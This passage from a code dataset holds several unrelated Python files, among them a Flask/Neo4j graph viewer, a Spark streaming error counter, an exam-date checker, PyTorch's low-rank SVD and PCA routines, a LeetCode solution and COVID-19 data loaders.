reserved['AvailabilityZone'] != self.availability_zone)):\n return False\n return True\n\n\ndef guess_os(instance):\n console_output = instance.console_output()['Output']\n if 'Windows' in console_output:\n return ('Windows', 'win')\n else:\n if 'RHEL' in console_output:\n return ('Red Hat Enterprise Linux', 'rhel')\n elif 'SUSE' in console_output:\n return ('SUSE Linux', 'suse')\n else:\n return ('Linux/UNIX', 'linux')\n","sub_path":"accloudtant/aws/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"398577405","text":"# coding=utf-8\nfrom flask import Flask, jsonify, render_template\nfrom neo4j import GraphDatabase\nfrom flask import request\nfrom py2neo import Graph,Node,Relationship\n\ndriver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=(\"neo4j\",\"neo4j\")) #认证连接数据库\n\napp = Flask(__name__) #flask框架必备\ngraph = Graph()\n\n\ndef buildNodes(nodeRecord):\n data = {\"id\": str(nodeRecord.n._id), \"label\": next(iter(nodeRecord.n.labels))}\n data.update(nodeRecord.n.properties)\n\n return {\"data\": data}\n\ndef buildEdges(relationRecord):\n data = {\"source\": str(relationRecord.r.start_node.properties['id']),\n \"target\": str(relationRecord.r.end_node.properties['id']),\n \"relationship\": relationRecord.r.rel.type}\n\n return {\"data\": data}\n\n\n@app.route('/')#建立路由,指向网页\ndef index():\n return render_template('search.html')\n\n\n@app.route('/searchGraph')\ndef searchGraph():\n node = request.args.get('wd')\n print(node)\n with open(\"node.txt\", \"w\") as f:\n f.write(node)\n return render_template('index.html', node=node)\n\n#Laurence\n@app.route('/graph')#两个路由指向同一个网页,返回图的节点和边的结构体\ndef get_graph():\n # nodes = list(map(buildNodes, graph.run('MATCH (n) RETURN n').data()))\n #\n # edges = list(map(buildEdges, graph.run('MATCH ()-[r]->() RETURN r').data()))\n # # elements = {\"nodes\": nodes, \"edges\": edges}\n\n with open(\"node.txt\", \"r\", encoding='utf-8') as f:\n line = f.readlines()\n line = line[0].strip()\n print(\"1.{}\".format(line))\n #\n # with driver.session() as session:\n # # strAll = 'MATCH (p1{name:\"Laurence Fishburne\"})-[r1:ACTED_IN]->(m)<-[r2:DIRECTED]-(p2) RETURN p1,m,p2,r1,r2'\n # #\n # # print(strAll)\n # # results=session.run(strAll).values()\n # # nodeList=[]\n # # edgeList=[]\n # # for result in results:\n # # nodeList.append(result[0])\n # # nodeList.append(result[1])\n # # nodeList.append(result[2])\n # # nodeList=list(set(nodeList))\n # # edgeList.append(result[3])\n # # edgeList.append(result[4])\n # #\n # # nodes = list(map(buildNodes, nodeList))\n # # edges = list(map(buildEdges,edgeList))\n #\n # strNode = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN n,p,r LIMIT 25\"\n # # strNode = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN n,p LIMIT 25\"\n # print(strNode)\n # # nodes = list(map(buildNodes,graph.run(strNode).data()))\n #\n # nodes = []\n # for node in graph.run(strNode).data():\n # nodeResult = buildNodes(node)\n # nodes.append(nodeResult)\n #\n # strEdge = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN r LIMIT 25\"\n # # strEdge = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN r LIMIT 25\"\n # print(strEdge)\n #\n # # edges= list(map(buildEdges,graph.run(strEdge).data()))\n # edges = []\n # for edge in graph.run(strEdge).data():\n # edgeResult = buildEdges(edge)\n # edges.append(edgeResult)\n\n nodes = list(map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n')))\n edges = list(map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r')))\n\n return jsonify(elements = {\"nodes\": nodes, \"edges\": edges})\n\nif __name__ == '__main__':\n app.run(debug = True) #flask框架必备","sub_path":"front/neo4j-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"171906493","text":"import sys\n\nfrom pyspark import SparkContext # allow us to work with spark\nfrom pyspark.streaming import StreamingContext # allow to work with streams in spark\n\nif __name__ == \"__main__\":\n sc = SparkContext(\"local[2]\", \"StreamingCount\")\n sc.setLogLevel(\"WARN\")\n\n ssc = StreamingContext(sc, 2) # 2 is a batchInterval prop of the DStream created by this StreamingContext\n\n ssc.checkpoint('file:///tmp/spark')\n\n lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2])) # hostname and port\n\n counts = lines.flatMap(lambda line: line.split(\" \"))\\\n .filter(lambda word: \"ERROR\" in word)\\\n .map(lambda word: (word, 1))\\\n .reduceByKeyAndWindow(lambda a, b: a + b, lambda a, b: a - b, 20, 2)\n\n counts.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n# ncat -lk 9999\n# spark-submit .\\reduce_by_key_and_window.py localhost 9999\n","sub_path":"reduce_by_key_and_window.py","file_name":"reduce_by_key_and_window.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"534256401","text":"# -*- coding: utf-8 -*-\n# Created by Daniel Liu on 2017/7/25\nimport datetime\nimport time\nimport traceback\n\nfrom Browser import Browser\nfrom Config import Config\nfrom MailAgent import MailAgent\nfrom lib.Log import Log\n\nreportedDates = {'RMIT': [], 'PEARSON': [], 'CLIFTON': []}\n\n\ndef compareDate(reported, result):\n return reported[\"year\"] == result[\"year\"] and \\\n reported[\"month\"] == result[\"month\"] and \\\n reported[\"day\"] == result[\"day\"]\n\n\ndef processRetrievedData(data, config, log):\n message = \"Available Dates: \\n\"\n needReport = False\n for testCenter in [\"RMIT\", \"PEARSON\", \"CLIFTON\"]:\n # First remove disappeared dates\n for reportedDate in reportedDates[testCenter]:\n needRemove = True\n for result in data[testCenter]:\n if compareDate(reportedDate, result):\n needRemove = False\n if needRemove:\n reportedDates[testCenter].remove(reportedDate)\n # Then determine whether there are dates that needs to be reported\n tomorrow = datetime.date.today() + datetime.timedelta(1)\n for result in data[testCenter]:\n if config.isOnlyReportSpecificMonth() and result['month'] != config.getSpecificMonth():\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if config.isOnlyReportCurrentMonth() and result[\"month\"] != tomorrow.month:\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if (not config.isReportWithin24HoursAppointments()) and result['day'] == tomorrow.day + 1:\n log.info('Within 24 Hours: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n message += \"{0}: {1}-{2}-{3} \\n\".format(testCenter, result[\"year\"], result[\"month\"], result[\"day\"])\n if len(reportedDates[testCenter]) == 0:\n reportedDates[testCenter].append(result)\n needReport = True\n for reportedDate in reportedDates[testCenter]:\n if compareDate(reportedDate, result):\n continue\n else:\n reportedDates[testCenter].append(result)\n needReport = True\n return message, needReport\n\ndef main():\n logger = Log(\"PTE-ACC\", \"PTEChecker.log\", \"Logs\")\n config = Config(\"PTEChecker.conf\", logger)\n while True:\n try:\n mailAgent = MailAgent(config, logger)\n browser = Browser(config, logger)\n data = browser.startRetrieveData()\n message, needReport = processRetrievedData(data, config, logger)\n if needReport:\n mailAgent.sendEmail(message)\n logger.debug('Message has been sent.')\n if not needReport:\n logger.info('No desired dates.')\n logger.info('Routine check finished.')\n time.sleep(config.getScanIntervals())\n\n except Exception as e:\n logger.error('Error occurred: {0}'.format(e))\n logger.error(traceback.format_exc())\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"267164924","text":"from .shape import ShapeStructs as ss\r\nfrom .piece import Piece\r\n\r\nclass Player:\r\n\r\n def __init__(self, color, pieceSet):\r\n self.color = color\r\n self.pieceSet = []\r\n for pieceInstructions in pieceSet:\r\n self.pieceSet.append(pieceInstructions)\r\n\r\n def removePiece(self, piece):\r\n for pieceObj in self.pieceSet:\r\n if pieceObj.id == piece.id:\r\n self.pieceSet.remove(pieceObj)\r\n\r\n def piecesAsString(self):\r\n toReturn = ''\r\n divider = ''\r\n for piece in self.pieceSet:\r\n toReturn += divider\r\n toReturn += piece.id\r\n divider = ','\r\n return toReturn\r\n\r\n def validatePlayerHasPiece(self, piece):\r\n playerHasPlayedPiece = True\r\n for myPiece in self.pieceSet:\r\n if piece.id == myPiece.id:\r\n playerHasPlayedPiece = False\r\n\r\n if playerHasPlayedPiece:\r\n raise PieceHasBeenPlacedError(\"This piece has been placed\")\r\n\r\nclass Error(Exception):\r\n pass\r\n\r\nclass PieceHasBeenPlacedError(Error):\r\n def __init__(self, message):\r\n self.message = message","sub_path":"backup/blockoo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"542137854","text":"#!/usr/bin/python\n\nfilerow = []\nrowline = []\ncrimefile = open(\"tahoe-r.txt\", 'r')\nfor line in crimefile.readlines():\n\tline = line.strip()\n\trowline = line.split(\" \")\t\n\tfilerow.append(rowline)\nfilerwo_len = len(filerow)\n\nfilerow2 = []\nrowline2 = []\n\nfor i in range(len(filerow)):\n\trowline2 = []\n\tif( i > 9):\n\t\trowline2.append(filerow[i][1])\n\t\tduration = (80000/(float(filerow[i][1]) -float(filerow[i - 10][1])))\n\t\trowline2.append(duration)\n\t\tfilerow2.append(rowline2)\n\noutput = open(\"tahoe-thr.txt\", 'w')\n\nstring =\"\"\nfor item in filerow2:\n\tstring = str(item[0]) +\" \" + str(item[1]) \t\n\toutput.write(\"%s\\n\" % string)\n\nprint (filerow)\n","sub_path":"CS-252-ComputerNetworksLab/11/tahoe-thr.py","file_name":"tahoe-thr.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"652604716","text":"\"\"\"\nGiven an array of integers, find out whether there are two distinct indices i and j in the array such that the absolute difference between nums[i] and nums[j] is at most t and the absolute difference between i and j is at most k.\n\nExample 1:\n Input: nums = [1,2,3,1], k = 3, t = 0\n Output: true\n\nExample 2:\n Input: nums = [1,0,1,1], k = 1, t = 2\n Output: true\n\nExample 3:\n Input: nums = [1,5,9,1,5,9], k = 2, t = 3\n Output: false\n\"\"\"\n\n\n# too slow\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n print(unique_nums)\n\n for unique_num in unique_nums:\n print(unique_num)\n\n for new_unique_num in unique_nums:\n if abs(new_unique_num - unique_num) <= t:\n\n if new_unique_num == unique_num:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n for j in range(i + 1, len(unique_nums[unique_num])):\n if unique_nums[unique_num][j] - unique_nums[unique_num][i] <= k:\n return True\n else:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n print(\"i: \"+str(i))\n for j in range(0, len(unique_nums[new_unique_num])):\n print(\"j: \" + str(j))\n if abs(unique_nums[unique_num][i] - unique_nums[new_unique_num][j]) <= k:\n return True\n return False\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n # store the nums and their position into a dict\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n\n print(unique_nums)\n # sort the keys of the dict\n sorted_keys = sorted(unique_nums)\n # the number of distinct keys\n num_of_unique = len(sorted_keys)\n print(sorted_keys)\n\n # iterate through the sorted keys to find out the result\n for i in range(0, num_of_unique):\n i_list = unique_nums[sorted_keys[i]]\n print(i_list)\n for j in range(i, num_of_unique):\n # check if the difference of two keys is at most t\n if sorted_keys[j] - sorted_keys[i] <= t:\n print(sorted_keys[j] - sorted_keys[i])\n # check if there are two indexs which have a difference at most k\n if i == j:\n for index in range(0, len(i_list)-1):\n if i_list[index + 1] - i_list[index] <= k:\n return True\n else:\n for index_i in i_list:\n for index_j in unique_nums[sorted_keys[j]]:\n if abs(index_i - index_j) <= k:\n return True\n else:\n # break the loop\n break\n return False\n\n\ninput1 = [1,2,3,1]\nk1 = 3\nt1 = 0\n\ninput2 = [1,0,1,1]\nk2 = 1\nt2 = 2\n\ninput3 = [1,5,9,1,5,9]\nk3 = 2\nt3 = 3\n\ninput4 = [10,100,11,9,100,10]\nk4 = 1\nt4 = 2\n\nprint(containsNearbyAlmostDuplicate(input3, k3, t3))\n\n","sub_path":"LeetCode-Python/220 Contains Duplicate III.py","file_name":"220 Contains Duplicate III.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"264528712","text":"\"\"\"Implement various linear algebra algorithms for low rank matrices.\n\"\"\"\n\n__all__ = ['svd_lowrank', 'pca_lowrank']\n\nfrom typing import Tuple, Optional\n\nimport torch\nfrom torch import Tensor\nfrom . import _linalg_utils as _utils\nfrom ._overrides import has_torch_function, handle_torch_function\n\n\ndef get_approximate_basis(A, # type: Tensor\n q, # type: int\n niter=2, # type: Optional[int]\n M=None # type: Optional[Tensor]\n ):\n # type: (...) -> Tensor\n \"\"\"Return tensor :math:`Q` with :math:`q` orthonormal columns such\n that :math:`Q Q^H A` approximates :math:`A`. If :math:`M` is\n specified, then :math:`Q` is such that :math:`Q Q^H (A - M)`\n approximates :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 4.4 from\n Halko et al, 2009.\n\n .. note:: For an adequate approximation of a k-rank matrix\n :math:`A`, where k is not known in advance but could be\n estimated, the number of :math:`Q` columns, q, can be\n choosen according to the following criteria: in general,\n :math:`k <= q <= min(2*k, m, n)`. For large low-rank\n matrices, take :math:`q = k + 5..10`. If k is\n relatively small compared to :math:`min(m, n)`, choosing\n :math:`q = k + 0..2` may be sufficient.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int): the dimension of subspace spanned by :math:`Q`\n columns.\n\n niter (int, optional): the number of subspace iterations to\n conduct; ``niter`` must be a\n nonnegative integer. In most cases, the\n default value 2 is more than enough.\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n \"\"\"\n\n niter = 2 if niter is None else niter\n m, n = A.shape[-2:]\n dtype = _utils.get_floating_dtype(A)\n matmul = _utils.matmul\n\n R = torch.randn(n, q, dtype=dtype, device=A.device)\n\n A_H = _utils.transjugate(A)\n if M is None:\n (Q, _) = matmul(A, R).qr()\n for i in range(niter):\n (Q, _) = matmul(A_H, Q).qr()\n (Q, _) = matmul(A, Q).qr()\n else:\n M_H = _utils.transjugate(M)\n (Q, _) = (matmul(A, R) - matmul(M, R)).qr()\n for i in range(niter):\n (Q, _) = (matmul(A_H, Q) - matmul(M_H, Q)).qr()\n (Q, _) = (matmul(A, Q) - matmul(M, Q)).qr()\n\n return Q\n\n\ndef svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Return the singular value decomposition ``(U, S, V)`` of a matrix,\n batches of matrices, or a sparse matrix :math:`A` such that\n :math:`A \\approx U diag(S) V^T`. In case :math:`M` is given, then\n SVD is computed for the matrix :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 5.1 from\n Halko et al, 2009.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n .. note:: The input is assumed to be a low-rank matrix.\n\n .. note:: In general, use the full-rank SVD implementation\n ``torch.svd`` for dense matrices due to its 10-fold\n higher performance characteristics. The low-rank SVD\n will be useful for huge sparse matrices that\n ``torch.svd`` cannot handle.\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of A.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n if not torch.jit.is_scripting():\n tensor_ops = (A, M)\n if (not set(map(type, tensor_ops)).issubset((torch.Tensor, type(None))) and has_torch_function(tensor_ops)):\n return handle_torch_function(svd_lowrank, tensor_ops, A, q=q, niter=niter, M=M)\n return _svd_lowrank(A, q=q, niter=niter, M=M)\n\n\ndef _svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n q = 6 if q is None else q\n m, n = A.shape[-2:]\n matmul = _utils.matmul\n if M is None:\n M_t = None\n else:\n M_t = _utils.transpose(M)\n A_t = _utils.transpose(A)\n\n # Algorithm 5.1 in Halko et al 2009, slightly modified to reduce\n # the number conjugate and transpose operations\n if m < n:\n # computing the SVD approximation of a transpose in order to\n # keep B shape minimal\n Q = get_approximate_basis(A_t, q, niter=niter, M=M_t)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B_t = matmul(A, Q_c)\n else:\n B_t = matmul(A, Q_c) - matmul(M, Q_c)\n U, S, V = torch.svd(B_t)\n V = Q.matmul(V)\n else:\n Q = get_approximate_basis(A, q, niter=niter, M=M)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B = matmul(A_t, Q_c)\n else:\n B = matmul(A_t, Q_c) - matmul(M_t, Q_c)\n U, S, V = torch.svd(_utils.transpose(B))\n U = Q.matmul(U)\n\n return U, S, V\n\n\ndef pca_lowrank(A, q=None, center=True, niter=2):\n # type: (Tensor, Optional[int], bool, int) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Performs linear Principal Component Analysis (PCA) on a low-rank\n matrix, batches of such matrices, or sparse matrix.\n\n This function returns a namedtuple ``(U, S, V)`` which is the\n nearly optimal approximation of a singular value decomposition of\n a centered matrix :math:`A` such that :math:`A = U diag(S) V^T`.\n\n .. note:: The relation of ``(U, S, V)`` to PCA is as follows:\n\n - :math:`A` is a data matrix with ``m`` samples and\n ``n`` features\n\n - the :math:`V` columns represent the principal directions\n\n - :math:`S ** 2 / (m - 1)` contains the eigenvalues of\n :math:`A^T A / (m - 1)` which is the covariance of\n ``A`` when ``center=True`` is provided.\n\n - ``matmul(A, V[:, :k])`` projects data to the first k\n principal components\n\n .. note:: Different from the standard SVD, the size of returned\n matrices depend on the specified rank and q\n values as follows:\n\n - :math:`U` is m x q matrix\n\n - :math:`S` is q-vector\n\n - :math:`V` is n x q matrix\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments:\n\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of\n :math:`A`. By default, ``q = min(6, m,\n n)``.\n\n center (bool, optional): if True, center the input tensor,\n otherwise, assume that the input is\n centered.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2.\n\n References::\n\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n\n if not torch.jit.is_scripting():\n if type(A) is not torch.Tensor and has_torch_function((A,)):\n return handle_torch_function(pca_lowrank, (A,), A, q=q, center=center, niter=niter)\n\n (m, n) = A.shape[-2:]\n\n if q is None:\n q = min(6, m, n)\n elif not (q >= 0 and q <= min(m, n)):\n raise ValueError('q(={}) must be non-negative integer'\n ' and not greater than min(m, n)={}'\n .format(q, min(m, n)))\n if not (niter >= 0):\n raise ValueError('niter(={}) must be non-negative integer'\n .format(niter))\n\n dtype = _utils.get_floating_dtype(A)\n\n if not center:\n return _svd_lowrank(A, q, niter=niter, M=None)\n\n if _utils.is_sparse(A):\n if len(A.shape) != 2:\n raise ValueError('pca_lowrank input is expected to be 2-dimensional tensor')\n c = torch.sparse.sum(A, dim=(-2,)) / m\n # reshape c\n column_indices = c.indices()[0]\n indices = torch.zeros(2, len(column_indices),\n dtype=column_indices.dtype,\n device=column_indices.device)\n indices[0] = column_indices\n C_t = torch.sparse_coo_tensor(\n indices, c.values(), (n, 1), dtype=dtype, device=A.device)\n\n ones_m1_t = torch.ones(A.shape[:-2] + (1, m), dtype=dtype, device=A.device)\n M = _utils.transpose(torch.sparse.mm(C_t, ones_m1_t))\n return _svd_lowrank(A, q, niter=niter, M=M)\n else:\n c = A.sum(dim=(-2,)) / m\n C = c.reshape(A.shape[:-2] + (1, n))\n ones_m1 = torch.ones(A.shape[:-1] + (1, ), dtype=dtype, device=A.device)\n M = ones_m1.matmul(C)\n return _svd_lowrank(A - M, q, niter=niter, M=None)\n","sub_path":"torch/_lowrank.py","file_name":"_lowrank.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"385738780","text":"import re\nfrom itertools import islice\n\nimport pandas as pd\n\nfrom . import helpers\n\nclass Record():\n def __init__(self, string):\n self.__dim= 0\n self.__size = 0\n self.__schema = None\n self.__data = {}\n\n string = string[9:-1] # Trim '(Record ...)'\n self.parse_input_string(string)\n\n def __str__(self):\n return \"\"\"Record:\n dim: {}\n size: {}\n schema: {}\n data: {}\n \"\"\".format(self.dim, self.size, self.schema, self.data)\n\n @property\n def dim(self):\n return self.__dim\n\n @property\n def size(self):\n return self.__dim\n\n @property\n def schema(self):\n return self.__schema\n\n @property\n def data(self):\n return self.__data\n\n def clean_freq_data(self):\n # In the files used as reference when creating this every record\n # contained a list of all the frequency points. This is nonsense\n if \"Freq\" not in self.__data:\n raise KeyError(\"Data does not contain frequency field\")\n\n self.data[\"Freq\"] = self.data[\"Freq\"][0]\n\n def parse_input_string(self, string):\n data_re = re.compile(r'\\(data[\\s\\S]+\\)')\n matches = re.search(data_re, string)\n if data_re:\n data = matches.group(0)\n data = data[4:-1] # strip \"(data ...)\"\n string = re.sub(data_re, '', string)\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n \n if keyword == 'schema':\n self.__schema = Schema(string[i:end+1])\n for key in self.schema.fields.keys():\n self.__data[key] = []\n skip = end-i\n next(islice(it, skip, skip), None)\n\n elif keyword == 'numDims':\n self.__dim = statement[1]\n \n elif keyword == 'size':\n self.__size = statement[1]\n\n else:\n raise KeyError('Unexpected keyword: {}'.format(statement[0]))\n\n record_locs = [x.start() for x in re.finditer('\\((record)', data)]\n records = []\n for i, _ in enumerate(record_locs):\n if i == len(record_locs)-1:\n records.append(data[record_locs[-1]:-2])\n else:\n records.append(data[record_locs[i]:record_locs[i+1]-2])\n\n for record in records:\n record_dict = self.parse_record(record)\n\n def parse_record(self, record):\n record = record[7:-1] # strip \"(record ...)\"\n fields = re.findall('\\(([^)]+)', record)\n for field in fields:\n field_name = re.search('\\\"\\w+\\\"', field).group(0).strip('\"')\n list_search = re.search('\\[.*\\]', field) \n number_search = re.search('-?\\d+\\.?\\d*', field)\n\n # This converts the freqs to floats which is okay but maybe not ideal\n if list_search:\n field_val = list_search.group(0)\n field_val = re.sub('[\\[\\]]', '', field_val).strip()\n field_val = [float(x) for x in field_val.split()]\n elif number_search:\n field_val = number_search.group(0)\n field_val = float(field_val)\n\n self.__data[field_name].append(field_val)\n \n def to_dataframes(self):\n proper_keys = (\"Mag\", \"Phase\", \"Vpos\", \"Hpos\", \"HV\", \"Freq\")\n if not all(k in self.data.keys() for k in proper_keys):\n raise KeyError(\"Record does not contain the correct keys: {}\".format(self.data.keys()))\n \n pos = list(zip(self.data[\"Vpos\"], self.data[\"Hpos\"]))\n dataframes = {}\n for i, freq in enumerate(self.data[\"Freq\"]):\n mags = [mag[i] for mag in self.data[\"Mag\"]]\n phases = [phase[i] for phase in self.data[\"Phase\"]]\n df = pd.DataFrame({'Position': pos, 'Mag': mags, 'Phase': phases})\n dataframes['{}'.format(freq)] = df\n\n return dataframes\n\n\n\nclass Schema():\n def __init__(self, string):\n self.__numFields = 0\n self.__fields = {}\n\n string = string[7:-1] # strip \"(schema ...)\"\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n\n if keyword == 'numFields':\n self.__numFields = statement[1]\n\n elif keyword == 'fieldName':\n self.new_field(string[i:end+1])\n skip = end-i\n next(islice(it, skip, skip), None)\n\n else:\n raise NotImplementedError('{} is not yet implemented\\n\\tFull statement: {}'.format(keyword, statement))\n\n def __str__(self):\n return \"\"\"\n numFields: {}\n fields: {}\n \"\"\".format(self.__numFields, self.__fields)\n\n @property\n def fields(self):\n return self.__fields\n\n @property\n def numFields(self):\n return self.__numFields\n\n def new_field(self, string):\n string = string[10:-1]\n fields = [s.strip().split() for s in re.split(r'[()]', string) if not s.isspace()]\n fieldname = fields[0][0].strip('\"')\n fields = fields[1:]\n temp = {}\n for field in fields:\n temp[field[0]] = field[1]\n\n self.__fields[fieldname] = temp\n\n\n\n \n","sub_path":"chamberplot/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"521081280","text":"import pandas as pd\nimport numpy as np\nfrom lmfit.models import StepModel\nimport os.path\n\ncases = 'https://covid.ourworldindata.org/data/ecdc/total_cases.csv'\ndeaths = 'https://covid.ourworldindata.org/data/ecdc/total_deaths.csv'\nUS_cases = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\"\nUS_deaths = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n\n\ndef state(s):\n return f'http://covidtracking.com/api/v1/states/{s}/daily.csv'\n\n\ndef date_to_int(s: str):\n padded = [x.zfill(2) for x in s.split('/')]\n return int(''.join([padded[i] for i in [2, 0, 1]]))\n\n\ndef date_to_str(d):\n s = str(d)\n s = [s[i:i + 2] for i in range(0, len(s), 2)]\n s[0] = \"20\" + s[0]\n return '-'.join(s)\n\n\ndata = dict()\ndata2 = dict()\n\npreds = dict()\n\nstate_data = dict()\n\nUS_data = dict()\nUS_data2 = dict()\n\npopulation_state = dict()\npopulation_county = dict()\n\n\ndef get_data(date):\n if date in data:\n return data[date]\n elif os.path.isfile(f\"assets/cases/df_{date}.csv\"):\n df = pd.read_csv(f\"assets/cases/df_{date}.csv\")\n data[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(cases)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/cases/df_{len(df.index) - 1}.csv\")\n data[len(df.index) - 1] = df\n return df\n\n\ndef get_data2(date):\n if date in data2:\n return data2[date]\n elif os.path.isfile(f\"assets/deaths/df2_{date}.csv\"):\n df = pd.read_csv(f\"assets/deaths/df2_{date}.csv\")\n data2[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(deaths)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/deaths/df2_{len(df.index) - 1}.csv\")\n data2[len(df.index) - 1] = df\n return df\n\n\ndef get_us_data(date):\n if date in US_data:\n df = US_data[date]\n return df\n elif os.path.isfile(f\"assets/john_hopkins/cases_{date}.csv\"):\n df = pd.read_csv(f\"assets/john_hopkins/cases_{date}.csv\", index_col=0)\n US_data[date] = df\n return df\n else:\n print(\"Getting data...\")\n df = pd.read_csv(US_cases)\n df.columns.values[11:] = df.columns[11:].map(date_to_int).values\n df = df.T[np.concatenate([np.array([True] * 11), df.T.index[11:] <= date])].T\n US_data[df.columns[-1]] = df\n df.to_csv(f\"assets/john_hopkins/cases_{df.columns[-1]}.csv\")\n return df\n\n\ndef get_us_data2(date):\n if date in US_data2:\n df2 = US_data2[date]\n return df2\n elif os.path.isfile(f\"assets/john_hopkins/deaths_{date}.csv\"):\n df2 = pd.read_csv(f\"assets/john_hopkins/deaths_{date}.csv\", index_col=0)\n US_data2[date] = df2\n return df2\n else:\n print(\"Getting data...\")\n df2 = pd.read_csv(US_deaths)\n df2.columns.values[12:] = df2.columns[12:].map(date_to_int).values\n df2 = df2.T[np.concatenate([np.array([True] * 12), df2.T.index[12:] <= date])].T\n US_data2[df2.columns[-1]] = df2\n df2.to_csv(f\"assets/john_hopkins/deaths_{df2.columns[-1]}.csv\")\n return df2\n\n\ndef get_state_data2(s: str, date: 